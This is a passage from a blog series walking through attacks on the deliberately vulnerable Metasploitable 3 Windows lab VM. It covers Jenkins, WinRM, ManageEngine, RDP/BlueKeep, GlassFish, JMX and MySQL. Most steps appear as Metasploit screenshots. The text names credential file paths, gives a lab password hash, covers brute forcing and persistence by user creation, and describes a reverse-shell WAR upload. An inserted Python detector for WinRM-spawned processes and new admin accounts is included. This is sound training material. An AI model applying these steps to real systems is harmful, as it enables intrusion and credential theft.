none; display: block; background-image: none;" alt="Accessing Apache Struts2" src="https://drive.google.com/uc?id=16zBKp66lIYCsg8v1k5rNuuOx3a-qH7YV" border="0"></a><h3>Exploiting Struts2 using Metasploit</h3><p>This service is exploitable using Metasploit:<p><a href="https://drive.google.com/uc?id=1UYnB8ZNLLh3bBicudntllVlsZFyXZEDn" target="_blank"><img width="806" height="265" title="Exploiting Struts2 with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Struts2 with Metasploit" src="https://drive.google.com/uc?id=1tHaCOEZB_djdWMEEmHR_v4l379KRg6hn" border="0"></a><p>As usual, using the default settings for target (Java) and payload, you will get a low privilege session.<p>Change the target to Windows:<p><a href="https://drive.google.com/uc?id=1l6dt7c-nZiujqkfnvXRN8C1zqB4rIHdb" target="_blank"><img width="806" height="293" title="Exploiting Struts2 with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Struts2 with Metasploit" src="https://drive.google.com/uc?id=1c8meCv6f-544laRflvXTurw8FQXvNpmT" border="0"></a><p>Now you have a high privilege session.<h2>Exploiting Port 8484 – Jenkins</h2><p>Jenkins is an open source automation server written in Java.
Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery.<p>As soon as you browse to the service, you will be told where to find the administrator password.</p><p><a href="https://drive.google.com/uc?id=1K8MU8OYXPeg62d9viO9ZkM70eEKGB-SF" target="_blank"><img width="753" height="347" title="Jenkins entry page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Jenkins entry page" src="https://drive.google.com/uc?id=1KQYSHea5GxfoXP5uwb_WkPBAuZ3JHBPm" border="0"></a><p>As you did before, using a shell you can access the <strong>initialAdminPassword</strong> file and read the password.<p><a href="https://drive.google.com/uc?id=1s2Zu4wZsme3923iKo8t0hA4NK3AFWGrh" target="_blank"><img width="806" height="57" title="Jenkins password" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Jenkins password" src="https://drive.google.com/uc?id=1pQ-KvVXEw6ahl3NM4pAviE4pB_cZJgKg" border="0"></a><p>Now, using this password you can administer the Jenkins service:<p><a href="https://drive.google.com/uc?id=1KifeMI85luokX5fWLRm0b5t2_YR0PxQt" target="_blank"><img width="754" height="458" title="Accessing Jenkins" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Jenkins" src="https://drive.google.com/uc?id=17mBxKVynitVHVcsxYZr1dE-fqCJv5pym" border="0"></a><h3>Enumerating Jenkins using Metasploit</h3><p>The initial version of Metasploitable 3 shipped with Jenkins v1.67 and that was very vulnerable to enumeration.
The current version of the vulnerable VM ships with Jenkins 2.02 and that behaves completely differently:<p><a href="https://drive.google.com/uc?id=1sMp9MZWllHNbf4qysgB28JzGvKhHU-82" target="_blank"><img width="806" height="223" title="Enumerating Jenkins with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Jenkins with Metasploit" src="https://drive.google.com/uc?id=18tqMFE8VNLNhsUs5njyvKEry6WBrL8SS" border="0"></a><h3>Exploiting Jenkins using Metasploit</h3><p>Using the previous credentials, you can get a meterpreter shell:<p><a href="https://drive.google.com/uc?id=1R0u2fu99w7bB4PLuHBXbfNVcWXCTYIuk" target="_blank"><img width="806" height="437" title="Exploiting Jenkins with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Jenkins with Metasploit" src="https://drive.google.com/uc?id=16T2z2d3UUjTVtd3syhb7vmwOsj1_y0k7" border="0"></a><p>But it is a low privilege session…</p><p><strong>Next post</strong>: <a title="Metasploitable 3 W2k8 Walkthrough: Part X" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part-x.html">Metasploitable 3 W2k8 Walkthrough: Part X</a></p><p>Posted by Rui Natário.</p><h1>Metasploitable 3 Windows Walkthrough: Part VIII</h1><p>Published 2020-11-05, updated 2020-11-21.</p><h2>Exploiting Port 5985 – Windows Remote Management</h2><p>Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate.
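<p>Before the modules below, here is the defender's view of the two things this post does over WinRM: run a remote command and create a new local user for persistence. The script is an added example, not code from the post or from Microsoft. It assumes Sysmon event ID 1 for process creation (with Image, ParentImage, User and CommandLine fields), the Security log's 4720 (user account created) and 4732 (member added to a security-enabled local group) events, and that commands run through a WinRM remote shell appear as children of <em>winrshost.exe</em> (PowerShell remoting uses <em>wsmprovhost.exe</em>). All event records, host and account names are constructed; the 4732 record is simplified to carry the member name directly.</p>

```python
"""Correlate Windows event data for the two WinRM actions shown in this post.

Added example for this walkthrough; not code from the post or from any
Microsoft tooling. Assumptions: commands run through a WinRM remote shell are
children of winrshost.exe (PowerShell remoting uses wsmprovhost.exe), Sysmon
event ID 1 records process creation with Image/ParentImage/User/CommandLine,
and the Security log records 4720 (user account created) and 4732 (member
added to a security-enabled local group). The events below are constructed.
"""
import ntpath
from datetime import datetime, timedelta

WINRM_HOSTS = {"winrshost.exe", "wsmprovhost.exe"}
PRIVILEGED_GROUPS = {"administrators", "remote desktop users", "remote management users"}
WINDOW = timedelta(minutes=10)   # 4720 -> 4732 within this span is suspicious

SAMPLE_EVENTS = [  # constructed; host, user and account names are made up
    {"ts": "2020-11-05T09:00:00", "source": "Security", "id": 4720,
     "SubjectUserName": "itadmin", "TargetUserName": "svc_backup"},
    {"ts": "2020-11-05T14:10:02", "source": "Sysmon", "id": 1,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\winrshost.exe",
     "User": r"METASPLOITABLE3\vagrant",
     "CommandLine": "cmd.exe /c net user newuser * /add"},
    {"ts": "2020-11-05T14:10:03", "source": "Security", "id": 4720,
     "SubjectUserName": "vagrant", "TargetUserName": "newuser"},
    {"ts": "2020-11-05T14:10:05", "source": "Security", "id": 4732,
     "SubjectUserName": "vagrant", "TargetUserName": "Administrators",
     "MemberName": r"METASPLOITABLE3\newuser"},
    {"ts": "2020-11-05T14:30:00", "source": "Sysmon", "id": 1,
     "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "User": r"METASPLOITABLE3\vagrant", "CommandLine": "explorer.exe"},
]


def _when(event):
    return datetime.fromisoformat(event["ts"])


def winrm_spawned_processes(events):
    """Return (ts, user, command line) for every process started by a WinRM host."""
    hits = []
    for e in events:
        if e.get("source") == "Sysmon" and e.get("id") == 1:
            parent = ntpath.basename(e.get("ParentImage", "")).lower()
            if parent in WINRM_HOSTS:
                hits.append((e["ts"], e.get("User"), e.get("CommandLine")))
    return hits


def new_privileged_accounts(events):
    """Return (account, group, creator) for accounts created and then added to a
    privileged local group within WINDOW; a 4720 on its own is treated as benign."""
    created = {}   # account name -> (creation time, subject who created it)
    hits = []
    for e in sorted(events, key=_when):
        if e.get("source") != "Security":
            continue
        if e["id"] == 4720:
            created[e["TargetUserName"].lower()] = (_when(e), e["SubjectUserName"])
        elif e["id"] == 4732 and e["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            member = e.get("MemberName", "").split("\\")[-1].lower()
            if member in created and _when(e) - created[member][0] <= WINDOW:
                hits.append((member, e["TargetUserName"], created[member][1]))
    return hits


if __name__ == "__main__":
    for hit in winrm_spawned_processes(SAMPLE_EVENTS):
        print("WinRM-spawned process:", hit)
    for hit in new_privileged_accounts(SAMPLE_EVENTS):
        print("new privileged account:", hit)
```

<p>A 4720 on its own is routine; the pairing with a 4732 into a privileged group minutes later, created from a session whose parent is a WinRM shell host rather than an interactive logon, is what turns it into an alert. Port 5985 should also simply not be reachable from outside the management network.</p>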
<h3>Accessing Port 5985</h3><p>Load the proper Metasploit module and use the existing credentials:<p><a href="https://drive.google.com/uc?id=1FcXUbag8bVgjnnCWOXflbfsGKUglOmwm" target="_blank"><img width="806" height="230" title="Brute forcing WinRM with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing WinRM with Metasploit" src="https://drive.google.com/uc?id=1MgUv3sPP0Fo_JhHqcPniGn3SUNqLu_vk" border="0"></a><h3>Exploiting Port 5985</h3><p>Executing remote commands is easy with the appropriate module.<p>Create a new user, maybe to use as a persistence technique:<p><a href="https://drive.google.com/uc?id=1DY3CwdY1wiPsuBf4nziGlMGs0d4ptvIh" target="_blank"><img width="806" height="242" title="Exploiting WinRM with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting WinRM with Metasploit" src="https://drive.google.com/uc?id=1Qng6TyQYwJtbCGr_2Hrj7jgoL21M_kH4" border="0"></a><p>But a meterpreter shell is also easy to get:<p><a href="https://drive.google.com/uc?id=1v1KTHXWtJAai8AOI_cS8ku0k9Hk3hxjZ" target="_blank"><img width="806" height="492" title="Exploiting WinRM with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting WinRM with Metasploit" src="https://drive.google.com/uc?id=1M1yKv5HlYaLYq6sbazvjZluI2V5ef7rg" border="0"></a><h2>Exploiting Port 8020 – Desktop Manage Engine</h2><p>ManageEngine offers enterprise IT management software for your service management, operations management, Active Directory and security needs.<h3>Accessing Desktop Manage Engine</h3><p>When you browse this port, you will see the entry page of the service waiting for login credentials:<p><a href="https://drive.google.com/uc?id=1SiN-5mm5I8d-YSerkxua0fmiQ5OeVqbn" target="_blank"><img width="637" height="396" title="ManageEngine login page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="ManageEngine login page" src="https://drive.google.com/uc?id=13j96Vu8Egpa1m91LJnF6ynBmbUDQPFMP" border="0"></a><p>Try to brute force your access with Metasploit:<p><a href="https://drive.google.com/uc?id=1A_c6tQAYykVsvGMXXtncb9FkV4ZyQcBf" target="_blank"><img width="806" height="229" title="Brute forcing ManageEngine with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing ManageEngine with Metasploit" src="https://drive.google.com/uc?id=1ZsHtIYaMth7fILQAvffqFF9hlU856zE2" border="0"></a><p>Using these credentials, you can now enter the Desktop Central 9 Administration page:<p><a href="https://drive.google.com/uc?id=1IwdpFbPQXPApgeVBb3rguW-nyC5O4NGQ" target="_blank"><img width="703" height="404" title="Accessing ManageEngine" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing ManageEngine" src="https://drive.google.com/uc?id=1mFDUwXBwETo4gzC-fNCW4aV-x0ZqbRLz" border="0"></a><p>From here it should be easy to turn this new access level into a shell on the target machine.
To turn regular functionality into a shell you should be looking out for functionality to upload files, install plugins, edit system files and anything else that allows you to execute code or commands on the target system.<p><a href="https://drive.google.com/uc?id=11NxJJONVwjvDZMN2lwGhEMgwLLPa5Tar" target="_blank"><img width="687" height="375" title="ManageEngine administration page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="ManageEngine administration page" src="https://drive.google.com/uc?id=1cBQO70RR0FRuWYZuf9XRVhbSin57oY_K" border="0"></a><p><b>NOTE</b>: The administration page can be accessed over the HTTP port 8020 and the HTTPS port 8383.<h3>Exploiting Desktop Manage Engine</h3><p>This service can also be exploited using a proper Metasploit module:<p><a href="https://drive.google.com/uc?id=1y1k_xzmC0JGi88FFq0Wp1WobRu3BFj2f" target="_blank"><img width="806" height="309" title="Exploiting ManageEngine with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting ManageEngine with Metasploit" src="https://drive.google.com/uc?id=1dfCb_MY5p_2iu_zLj-TcuoNzZB_d2oUV" border="0"></a></p><p><strong>Next post</strong>: <a title="Metasploitable 3 Windows Walkthrough: Part IX" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part_50.html">Metasploitable 3 Windows Walkthrough: Part IX</a></p><p>Posted by Rui Natário.</p><h1>Metasploitable 3 Windows Walkthrough: Part VII</h1><p>Published 2020-11-05, updated 2020-11-21.</p><h2>Exploiting Port 3389 – RDP</h2><p>By default, the Remote Desktop Protocol (RDP) is not enabled on any Windows operating system.
Metasploitable 3 has several RDP vulnerabilities.<p>Just by typing <b><em>rdesktop [Target IP]</em></b> you can get access to the remote machine, as long as you have valid credentials.</p><p><a href="https://drive.google.com/uc?id=1tFCS4TCnYLjZzrIS3UJ0JjMseoCyFlFI" target="_blank"><img width="815" height="708" title="Accessing RDP" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing RDP" src="https://drive.google.com/uc?id=1FyLlgP74RtoUzVlh3-wx5txrSsJcxkj1" border="0"></a><p>There are two vulnerabilities to be exploited in this service.</p><h3>DoS Exploit</h3><p>The MS-020 vulnerability can be exploited to cause a Denial of Service condition on the remote machine. Metasploit has a couple of modules to test and exploit this vulnerability.<p><a href="https://drive.google.com/uc?id=1YBbjahqM82DM1vQ7tkIWcwwkJ4acYtta" target="_blank"><img width="806" height="316" title="Exploiting RDP to cause a DoS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting RDP to cause a DoS" src="https://drive.google.com/uc?id=14Z48MT7iyycrZncBqcpUj0jeT4MfvC7F" border="0"></a><p><a href="https://drive.google.com/uc?id=1CZsZHCUm46QMVNLZRIpqZZLsj6XfRgzx" target="_blank"><img width="606" height="454" title="Exploiting RDP to cause a DoS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting RDP to cause a DoS" src="https://drive.google.com/uc?id=1iUSbqfkMWC2zJCJVbZqNTGuacGfXVr3U" border="0"></a><h3>BlueKeep Exploit</h3><p>This service is also vulnerable to the BlueKeep attack, and you can use the proper Metasploit module to check for the existence of this vulnerability on the target machine.<p><a href="https://drive.google.com/uc?id=1Inn-emGu6m7rMeloI5fQAT0YiufvANA4" target="_blank"><img width="806" height="133" title="Checking for BlueKeep vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking for BlueKeep vulnerability" src="https://drive.google.com/uc?id=1iVsp1De0jHzHCXyzD0JXJHLS6UvBNDAr" border="0"></a><p>However, even if the scanner module reports the target as vulnerable, the exploit module will consistently fail: it finishes without opening a session and crashes the target machine. The explanation can be found in the exploit module’s information:<p><i>Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout. <b>HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam</b> *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This is a non-standard configuration for normal servers, and the target will crash if the aforementioned Registry key is not set!</i><p>After setting the registry key to the correct value, the exploit module will work flawlessly:<p><a href="https://drive.google.com/uc?id=1k-hmrs8LWGyC3tbL1xjDJWSeKAUyz8Ej" target="_blank"><img width="806" height="356" title="Exploiting the BlueKeep vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the BlueKeep vulnerability" src="https://drive.google.com/uc?id=1yuQAB5QWthUYO4Swv-idJEnQl0ADP4oD" border="0"></a><h2>Exploiting Port 4848 – GlassFish</h2><p>GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform.
Accessing this port, you will see the interface of the Administration Console:<p><a href="https://drive.google.com/uc?id=1oydwgBzKz204GOdE_LnpUHMTFTYBjbKl" target="_blank"><img width="483" height="383" title="GlassFish Administration Console" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="GlassFish Administration Console" src="https://drive.google.com/uc?id=1M_VBpf54wHA7k-7UqigoaxmwMj38I-32" border="0"></a><h3>Getting GlassFish credentials</h3><p>Try to brute force your way in using Metasploit and the custom wordlists, including the credentials from WordPress:<p><a href="https://drive.google.com/uc?id=1r9k8NkKdwWVzRRy84w-2kST-AqnP1S6q" target="_blank"><img width="806" height="271" title="Brute forcing GlassFish with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing GlassFish with Metasploit" src="https://drive.google.com/uc?id=1Lhxbo8qxDPspxwZRdj5JoOZnkJDa9Juc" border="0"></a><p>Or try to get credentials in another way:<p><a href="https://drive.google.com/uc?id=1LBgxz4eU3rg_OM2ZzH6--xLp-yPiUk-e" target="_blank"><img width="806" height="203" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=1r7gNOafe70jGUGAH3S03fGgThNjfGS3Q" border="0"></a><p>By default, the module will download the win.ini file.<p>But you should try to get something far more important, like the users’ credentials.
And those are located at:<p><strong><em>glassfish/glassfish4/glassfish/domains/domain1/config/admin-keyfile</em></strong><p><a href="https://drive.google.com/uc?id=1bAOYJZu0zcGyuOKcBplQZEKGZkmmmUsD" target="_blank"><img width="806" height="90" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=1qr4ZrKqQLu5kXRO4mjYj25EmhbTtvYyz" border="0"></a><p><a href="https://drive.google.com/uc?id=19-sgJ5e8SminkMNO4lLA-ehvI47Rp6dr" target="_blank"><img width="806" height="66" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=1HVWUxisX09wK4nunhFExYX8HOiUO4lNn" border="0"></a><p>You have found the hash for the admin account.<p>Try to get another one:<p><a href="https://drive.google.com/uc?id=1CNxT8pkiv50xrhwCcUe9UJoZ5CXJst5n" target="_blank"><img width="806" height="88" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=1Ci1TZpx-2JTIhsl7aZceH3lp6IvVBnWA" border="0"></a><p><a href="https://drive.google.com/uc?id=1BGR8KVR0RkZ0XCxPGJHlj3o-8FuBLjXx" target="_blank"><img width="806" height="66" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=18Bcmqfvqwpbh0pgo1GXL0RDu0FOilrZS" border="0"></a><p>But this one is not associated with any user. 
From here you can try to identify the hash types, crack them, and so on.<p>Or you can try to log in using the last hash as the password:<p><strong>User</strong>: <i>admin</i>, <strong>Password</strong>: <i>183511DE8C2E7E281BE95DC1A3B6AAC3A51F9262</i><p><a href="https://drive.google.com/uc?id=1HcVG-TPD2SQyyDgc7VQ_y-PKTS9C6qIu" target="_blank"><img width="806" height="496" title="Accessing GlassFish" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing GlassFish" src="https://drive.google.com/uc?id=1_YlZ9I7zPDsuD9D23PKrj_D8F_7BPJCl" border="0"></a><p>Using the previous credentials, try to exploit the GlassFish service.</p><h3>Exploiting GlassFish using Metasploit</h3><p>Load the appropriate module and set the correct options:<p><a href="https://drive.google.com/uc?id=1gVYEWlmgYM-Efs0L57IzxYU8GWP7zYu3" target="_blank"><img width="806" height="417" title="Exploiting GlassFish with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting GlassFish with Metasploit" src="https://drive.google.com/uc?id=1QGoI2v1AtXGWhQQx4amUHVatt8oY0d7N" border="0"></a><p>Unfortunately, this module is sometimes a bit unstable, so if it fails the first time, just run it again.<h3>Exploiting GlassFish using manual injection</h3><p>Try to inject a malicious payload manually using the Administration Console.
In the <b><em>Applications</em></b> node, select the <b><em>Deploy</em></b> page.<p><a href="https://drive.google.com/uc?id=1i_y11-e33Ou0-hazL1NIz7aBov68ouf4" target="_blank"><img width="806" height="278" title="Looking for the place to deploy the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Looking for the place to deploy the payload" src="https://drive.google.com/uc?id=1zdjxQib4v7IY8psMUCO6p-c3tHFHj0RA" border="0"></a><p>In the <strong><em>Deploy</em></strong> page you will see where to upload the file to the server.<p><a href="https://drive.google.com/uc?id=1bWnQQT4CBaI1vIe7b_BVjPGg_syJNKXq" target="_blank"><img width="806" height="277" title="Looking for the place to deploy the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Looking for the place to deploy the payload" src="https://drive.google.com/uc?id=1nFdozm0CeZu8gJcYMIeIbBEnTGpYnlhY" border="0"></a><p>Assume you are dealing with the same format and generate a <b><em>.war</em></b> file with msfvenom:<p><a href="https://drive.google.com/uc?id=1RCDmsP9tvwDZ70k8UZFOtIOmGpWD64Kr" target="_blank"><img width="806" height="82" title="Creating the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating the payload" src="https://drive.google.com/uc?id=1ngaeYWWT4-SPDBYijIDrkFqIksawKtlP" border="0"></a><p>Prepare the handler/listener:<p><a href="https://drive.google.com/uc?id=1xdwUEvjdH1x3xVbJWChFj_gIecqU7WIS" target="_blank"><img width="546" height="195" title="Preparing the handler/listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Preparing the handler/listener" src="https://drive.google.com/uc?id=1KUrnk9N58dIPPdLpuPQOssH_PsYMsIrl" border="0"></a><p>Then browse to your payload and press <b><em>Ok</em></b> to upload it:<p><a href="https://drive.google.com/uc?id=1uMJb6bU4HHSXqk3wOLW9NGXGHfxWaU5d" target="_blank"><img width="806" 
height="227" title="Deploying the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Deploying the payload" src="https://drive.google.com/uc?id=1r0mhQv8m1SWdGf08ZAJw1y_muKiHwxl-" border="0"></a><p>You will now see your payload properly uploaded. Click <b><em>Launch</em></b>:<p><a href="https://drive.google.com/uc?id=14jqtELHWBougY4417dCW_N9CoBYfcVmV" target="_blank"><img width="806" height="280" title="Launching the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Launching the payload" src="https://drive.google.com/uc?id=1xMTiTvH8HX2PY9gwxG05ElMbl1QLgwlH" border="0"></a><p>That will open a secondary page:<p><a href="https://drive.google.com/uc?id=1tnyKz_0UREfGevikm0cX6QYPq8j6drf4" target="_blank"><img width="806" height="186" title="Launching the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Launching the payload" src="https://drive.google.com/uc?id=1ezzqnH1Qd9PQMKE9kPL6JEU-suLLQtcY" border="0"></a><p>Note that the links use the target’s hostname instead of its IP address. 
So, the browser won’t be able to resolve them:<p><a href="https://drive.google.com/uc?id=1CNkmTbT8d30RJxNx3rfCt9ZME3F_Hz3n" target="_blank"><img width="806" height="162" title="Launching the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Launching the payload" src="https://drive.google.com/uc?id=1tfYm_PatGIKzeMDehxKbVuceGgdkjBpU" border="0"></a><p>This is easily solved by replacing the hostname with the IP address in the URL:<p><a href="https://drive.google.com/uc?id=1L771zEWgbLCXQGmUxIPoTT4A_cXZskb-" target="_blank"><img width="806" height="168" title="Launching the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Launching the payload" src="https://drive.google.com/uc?id=1almm-pyzmlKNxDMN5WzXGzmyF1rYB5mK" border="0"></a><p>Move back to Metasploit and you will see the inbound connection from the GlassFish server.<p><a href="https://drive.google.com/uc?id=1ETXKXBwRl9NgGmFMgrvfix8GLcy5IFrZ" target="_blank"><img width="806" height="142" title="Reverse shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Reverse shell" src="https://drive.google.com/uc?id=1UfnXY8t54_qgdF8iP_0Am50PliQCXwdk" border="0"></a><p><br><p><p><a title="Metasploitable 3 Windows Walkthrough: Part VIII" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part_86.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-1156923451112986892020-11-05T09:24:00.000-08:002020-11-21T04:22:24.414-08:00Metasploitable 3 Windows Walkthrough: Part VI<h2>Exploiting Port 1617 - JMX</h2><p>Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. 
Those resources are represented by objects called MBeans (for Managed Bean).<p>Scan the target to check the existence of the service:<p><a href="https://drive.google.com/uc?id=1_2tiHFR8-r_48nqfNXbBoQ7K6Sz3pmXb" target="_blank"><img width="806" height="160" title="Checking the JMX service with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking the JMX service with Metasploit" src="https://drive.google.com/uc?id=1T-YrW5HZSP5BM00LmzXYDg6L4S9RxUI6" border="0"></a><p>Exploit:<p><a href="https://drive.google.com/uc?id=12zUX7pgE1-pXY8OXr2I_M-sk8xupUmtV" target="_blank"><img width="806" height="356" title="Exploiting the JMX service with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the JMX service with Metasploit" src="https://drive.google.com/uc?id=1gFl7_3JtR7JVcpRvusv5vv79MhBiaUTZ" border="0"></a><h2><a name="_Toc52385169"></a></h2><a name="more"></a><h2>Exploiting Port 3306 – MySQL</h2><p>The first step should be the discovery of at least one valid set of credentials.<p>Brute forcing MySQL is in its essence the same as brute forcing any other application, and therefore similar tools and techniques can be used.</p><h3>Brute forcing MySQL using Nmap</h3><p>The best option might be to start with some of Nmap’s scripts, because they are very fast and can give you instant results even without brute forcing. 
<p><a href="https://drive.google.com/uc?id=1Quk9VYfsAS6R2ga0vcwgTpLfJXMlXdwj" target="_blank"><img width="654" height="272" title="Getting MySQL credentials with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting MySQL credentials with Nmap" src="https://drive.google.com/uc?id=1ZjY7bxrOA40Q-2eznpFarSl6uIeG5SAr" border="0"></a><p><a href="https://drive.google.com/uc?id=1KpkovCR9MOEYxBfdQKBtEzmV7uKdn4bj" target="_blank"><img width="662" height="250" title="Getting MySQL credentials with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting MySQL credentials with Nmap" src="https://drive.google.com/uc?id=1lOK6dlG-ZmToRC5MThmg_GmXvz9Htsl8" border="0"></a><p>Unfortunately, the <b>mysql-brute</b> module is not working properly:<p><a href="https://drive.google.com/uc?id=1iRW-0wChgTcBZjwjxa2J5J87fBoOFpvM" target="_blank"><img width="806" height="203" title="Getting MySQL credentials with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting MySQL credentials with Nmap" src="https://drive.google.com/uc?id=1raTfjWx7abyWrnP4ydzfr75iMim3YBJ_" border="0"></a><h3>Brute forcing MySQL using Hydra</h3><p>Use some simple wordlists with common users and passwords:<p><a href="https://drive.google.com/uc?id=1d2uOiJZGHjZI16fxDmHi7Rm2QzrIgj0S" target="_blank"><img width="806" height="263" title="Brute forcing MySQL with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing MySQL with Hydra" src="https://drive.google.com/uc?id=1M0veoaxXjfpNOtQSUR9Qm0ZWaRjcf773" border="0"></a><h3>Brute forcing MySQL using Metasploit</h3><p>Use the proper auxiliary module. 
Try using a list of probable users and the <b><em>rockyou</em></b> list for passwords:<p><a href="https://drive.google.com/uc?id=10UDZVPy5CX8Ubmftq0zYJ3exRNK1gI9P" target="_blank"><img width="806" height="243" title="Brute forcing MySQL with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing MySQL with Metasploit" src="https://drive.google.com/uc?id=15IMS_95DnMW0Ni9CNzNdZZjc0WRQcvL0" border="0"></a><p>This will take a long time and the result is the same as before: <u>the root account has a blank password</u>. Therefore, you can connect to the database using Kali’s mysql client, specifying the username and the host IP.<p><a href="https://drive.google.com/uc?id=1o9zikH04YPLl0IFMkgXvYv3pYhXypyFH" target="_blank"><img width="682" height="227" title="Accessing the MySQL root account" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the MySQL root account" src="https://drive.google.com/uc?id=1St_fksfqAFPLE6XHmDc0O0ZsJKcgbptj" border="0"></a><p>Once you have root access to the database, you can do anything you want.<p>Several tools can be used to extract information from the target via the MySQL service.</p><h3>Enumerating MySQL using Nmap</h3><p>Nmap can also retrieve information from the MySQL database:<p><a href="https://drive.google.com/uc?id=1byzpTa5HZZTFjT4drFylBfT3Yv6KowLN" target="_blank"><img width="434" height="267" title="Nmap MySQL scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap MySQL scripts" src="https://drive.google.com/uc?id=1Opx4dslfwKD2yq15qKysWuUDDoto8KHM" border="0"></a><p>Unfortunately, only a few scripts are working properly.<p><a href="https://drive.google.com/uc?id=1Rvk75bMVfHPwt5fvA_GbN4-ABbh0GXzp" target="_blank"><img width="806" height="283" title="Enumerating MySQL with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Nmap" 
src="https://drive.google.com/uc?id=1OyKG0UrovgDKBF-qIiyHYIsfNGdLN0M7" border="0"></a><p>Others used to work but are now broken:<p><a href="https://drive.google.com/uc?id=1xqF5BwOR9sWOaOgXxd9JVrHmH4g5JuyH" target="_blank"><img width="806" height="245" title="Enumerating MySQL with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Nmap" src="https://drive.google.com/uc?id=1R5RsghdlWqFZ3_n3k_jA9iwL_-P9XXdU" border="0"></a><h4><a href="https://drive.google.com/uc?id=1qreNjoYBSZpY1m6vzhts1AprBJXBfQwX" target="_blank"><img width="806" height="230" title="Enumerating MySQL with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Nmap" src="https://drive.google.com/uc?id=1vJPP50VhNaVQhgt3d537dwZ2_uwrLPpi" border="0"></a></h4><h4><a href="https://drive.google.com/uc?id=1hDPkiH-gXhyW8UBTHT3KdKw5woa19b5l" target="_blank"><img width="806" height="295" title="Enumerating MySQL with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Nmap" src="https://drive.google.com/uc?id=1-2ENCFIVeu8NEPKlIRlB-jdFXmrZ5XD4" 